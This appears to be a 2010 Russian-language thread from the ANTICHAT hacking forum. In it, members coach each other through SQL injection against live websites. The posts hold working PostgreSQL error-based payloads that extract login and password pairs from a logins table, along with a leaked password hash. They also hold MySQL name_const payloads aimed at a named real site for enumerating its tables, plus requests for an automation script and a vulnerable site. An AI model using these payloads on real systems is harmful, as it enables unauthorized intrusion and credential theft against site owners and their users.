HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.02.2010, 00:52
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
По умолчанию

Подскажите с конструкцией типа:
Цитата:
select%20login::text::boolean%20from%20(select%20l ogin%20from%20logins%20limit%201%20offset+1)q;----
выдает логин
Цитата:
select%20passwd::text::boolean||chr(58)||login::te xt::boolean%20from%20(select%20passwd,login%20from %20logins%20limit%201%20offset+1)q;----
неверный входной синтаксис для типа boolean: "$1$rTat6wug$Qvx2HyTZNNKWYJnmszCP31" in /usr/ и т.д
т.е выдает только пароль
----------------
Как вывести информацию в виде loginasswd?

И подскажите скрипт для перебора limit offset с аутентификацией и работой с https? если таковой имеется
 
Ответить с цитированием

  #2  
Старый 16.02.2010, 08:10
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Цитата:
Сообщение от samarin  
Как вывести информацию в виде loginasswd?
Например, так
Код:
select (login||chr(58)||passwd)::text::boolean from (select passwd,login from logins limit 1 offset 1)q;----
или так
Код:
select a::text::boolean from (select (login||chr(58)||passwd) as a from logins limit 1 offset 1)q;----
 
Ответить с цитированием

  #3  
Старый 16.02.2010, 01:17
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

Цитата:
CyberHunter
Warning: Invalid argument supplied for foreach() in /usr/home/krutomer/krutomer.ru/html/city.php on line 301

в опере отображается а вот в мозилле нет )
 
Ответить с цитированием

  #4  
Старый 16.02.2010, 03:41
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

samarin
Цитата:
Изменение же LIMIT ... OFFSET на вывод не влияет, как выдал он tmplname, так его и выдает
Пробуй с подзапросами, тогда лимит должен работать
select (select table_name from information_schema.tables limit 1 offset 1)::text::boolean
 
Ответить с цитированием

  #5  
Старый 16.02.2010, 08:58
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
По умолчанию

krypt3r
Спасибо! Вы как всегда на высоте
Spyder
Цитата:
Пробуй с подзапросами, тогда лимит должен работать
select (select table_name from information_schema.tables limit 1 offset 1)::text::boolean
Тоже спасибо! Это мы уже с krypt3r-ом разобрали.

Вот бы скриптик, для автоматического перебора оффсета, с авторизацией и https и я бы от всех отстал (можетбыть...)

И подкиньте сайтик, может у кого завалялся, с доступом к usesuper для образовательных целей

Последний раз редактировалось samarin; 16.02.2010 в 09:10..
 
Ответить с цитированием

  #6  
Старый 17.02.2010, 18:26
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


По умолчанию

Помогите здесь скулю раскрутить:
http://zub.by/menu.php?form_id=1
Ввожу количество полей и всегда ошибка.
 
Ответить с цитированием

  #7  
Старый 17.02.2010, 18:42
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

Код:
http://zub.by/menu.php?form_id=(select*from(select+name_const(version(),1),name_const(version(),1))a)
 
Ответить с цитированием

  #8  
Старый 17.02.2010, 18:57
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


По умолчанию

Pashkela У меня ошибка при таком вводе
А зависит ли это от браузера?
 
Ответить с цитированием

  #9  
Старый 17.02.2010, 19:02
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

Правильно, ошибка, ты ошибку-то почитай
(5.0.51a-24)

PS: От версии браузера не зависит

Код:
http://zub.by/menu.php?form_id=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),1),name_const((select+table_name+from+information_schema.tables+limit+0,1),1))a)


http://zub.by/menu.php?form_id=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+1,1),1),name_const((select+table_name+from+information_schema.tables+limit+1,1),1))a)

.....

Последний раз редактировалось Pashkela; 17.02.2010 в 19:07..
 
Ответить с цитированием

  #10  
Старый 17.02.2010, 19:14
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


По умолчанию

Цитата:
Правильно, ошибка, ты ошибку-то почитай
(5.0.51a-24)

PS: От версии браузера не зависит
У меня ничего подобного, вот смотри, что у меня:

Цитата:
# select parent_id, IF(id in (select menu_id from pl_user_settings),1,0) as access from pl_menu_menu where id = (select*from(select name_const(ve rsion(),1),name_const(version(),1))a)
# You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rsion(),1),name_const(version(),1))a)' at line 2
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.